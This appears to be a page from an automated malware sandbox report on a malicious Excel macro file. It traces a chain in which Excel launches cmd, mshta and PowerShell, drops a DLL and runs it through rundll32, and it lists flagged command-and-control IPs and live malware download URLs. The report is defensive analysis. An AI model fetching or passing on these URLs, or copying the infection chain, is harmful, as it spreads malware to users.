Source: Yara match File source: 0000000B.00000002.503146920.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.500113987.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.551739042.0000000002890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.500072770.0000000003051000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678048662.0000000002D01000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499969504.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.499804100.00000000009B0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678386689.0000000002E51000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.678412347.0000000002E80000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\JooSee.dll, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562386 Sample: NZW-010122 BNUV-280122.xlsm Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 49 129.232.188.93 xneeloZA South Africa 2->49 51 162.214.50.39 UNIFIEDLAYER-AS-1US United States 2->51 53 42 other IPs or domains 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Found malware configuration 2->65 67 Antivirus detection for URL or domain 2->67 69 14 other signatures 2->69 15 EXCEL.EXE 7 10 2->15         started        signatures3 process4 file5 47 C:\Users\...\~$NZW-010122 BNUV-280122.xlsm, data 15->47 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 55 91.240.118.172, 49167, 49168, 80 GLOBALLAYERNL unknown 20->55 23 powershell.exe 12 7 20->23         started        process9 dnsIp10 57 weezual.fr 213.186.33.4, 49169, 80 OVHFR France 23->57 59 mycloud.suplitecmo.com 51.81.152.36, 49170, 80 OVHFR United States 23->59 45 C:\ProgramData\JooSee.dll, PE32 23->45 dropped 73 Powershell drops PE file 23->73 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        process15 32 rundll32.exe 1 30->32         started        file16 43 C:\Windows\SysWOW64\...\pcrxj.oyh (copy), PE32 32->43 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->61 36 rundll32.exe 32->36         started        signatures17 process18 process19 38 rundll32.exe 1 36->38         started        signatures20 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->71 41 rundll32.exe 38->41         started        process21
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
195.154.133.20
 unknown France
12876 OnlineSASFR true
185.157.82.211
 unknown Poland
42927 S-NET-ASPL true
212.237.17.99
 unknown Italy
31034 ARUBA-ASNIT true
79.172.212.216
 unknown Hungary
61998 SZERVERPLEXHU true
110.232.117.186
 unknown Australia
56038 RACKCORP-APRackCorpAU true
173.214.173.220
 unknown United States
19318 IS-AS-1US true
212.24.98.99
 unknown Lithuania
62282 RACKRAYUABRakrejusLT true
138.185.72.26
 unknown Brazil
264343 EmpasoftLtdaMeBR true
178.63.25.185
 unknown Germany
24940 HETZNER-ASDE true
160.16.102.168
 unknown Japan 9370 SAKURA-BSAKURAInternetIncJP true
81.0.236.90
 unknown Czech Republic
15685 CASABLANCA-ASInternetCollocationProviderCZ true
103.75.201.2
 unknown Thailand
133496 CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTH true
216.158.226.206
 unknown United States
19318 IS-AS-1US true
45.118.115.99
 unknown Indonesia
131717 IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaID true
51.15.4.22
 unknown France
12876 OnlineSASFR true
159.89.230.105
 unknown United States
14061 DIGITALOCEAN-ASNUS true
51.81.152.36
 mycloud.suplitecmo.com United States
16276 OVHFR false
162.214.50.39
 unknown United States
46606 UNIFIEDLAYER-AS-1US true
200.17.134.35
 unknown Brazil
1916 AssociacaoRedeNacionaldeEnsinoePesquisaBR true
217.182.143.207
 unknown France
16276 OVHFR true
107.182.225.142
 unknown United States
32780 HOSTINGSERVICES-INCUS true
51.38.71.0
 unknown France
16276 OVHFR true
45.118.135.203
 unknown Japan 63949 LINODE-APLinodeLLCUS true
50.116.54.215
 unknown United States
63949 LINODE-APLinodeLLCUS true
131.100.24.231
 unknown Brazil
61635 GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBR true
46.55.222.11
 unknown Bulgaria
34841 BALCHIKNETBG true
41.76.108.46
 unknown South Africa
327979 DIAMATRIXZA true
173.212.193.249
 unknown Germany
51167 CONTABODE true
45.176.232.124
 unknown Colombia
267869 CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOC true
178.79.147.66
 unknown United Kingdom
63949 LINODE-APLinodeLLCUS true
212.237.5.209
 unknown Italy
31034 ARUBA-ASNIT true
162.243.175.63
 unknown United States
14061 DIGITALOCEAN-ASNUS true
176.104.106.96
 unknown Serbia
198371 NINETRS true
207.38.84.195
 unknown United States
30083 AS-30083-GO-DADDY-COM-LLCUS true
164.68.99.3
 unknown Germany
51167 CONTABODE true
192.254.71.210
 unknown United States
64235 BIGBRAINUS true
212.237.56.116
 unknown Italy
31034 ARUBA-ASNIT true
104.168.155.129
 unknown United States
54290 HOSTWINDSUS true
45.142.114.231
 unknown Germany
44066 DE-FIRSTCOLOwwwfirst-colonetDE true
203.114.109.124
 unknown Thailand
131293 TOT-LLI-AS-APTOTPublicCompanyLimitedTH true
209.59.138.75
 unknown United States
32244 LIQUIDWEBUS true
159.8.59.82
 unknown United States
36351 SOFTLAYERUS true
129.232.188.93
 unknown South Africa
37153 xneeloZA true
91.240.118.172
 unknown unknown
49453 GLOBALLAYERNL true
58.227.42.236
 unknown Korea Republic of
9318 SKB-ASSKBroadbandCoLtdKR true
213.186.33.4
 weezual.fr France
16276 OVHFR false
158.69.222.101
 unknown Canada
16276 OVHFR true
104.251.214.46
 unknown United States
54540 INCERO-HVVCUS true

Contacted Domains

Name IP Active
mycloud.suplitecmo.com 51.81.152.36 true
weezual.fr 213.186.33.4 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://weezual.fr/ju9c/twEHJDCvNwGimD/ true
  • Avira URL Cloud: malware
 unknown
http://mycloud.suplitecmo.com/Fox-CCFS/zBdGqiyW1HTZD2j/ true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.172/cc/vv/fe.png true
  • Avira URL Cloud: malware
 unknown
http://91.240.118.172/cc/vv/fe.html true
  • Avira URL Cloud: malware
 unknown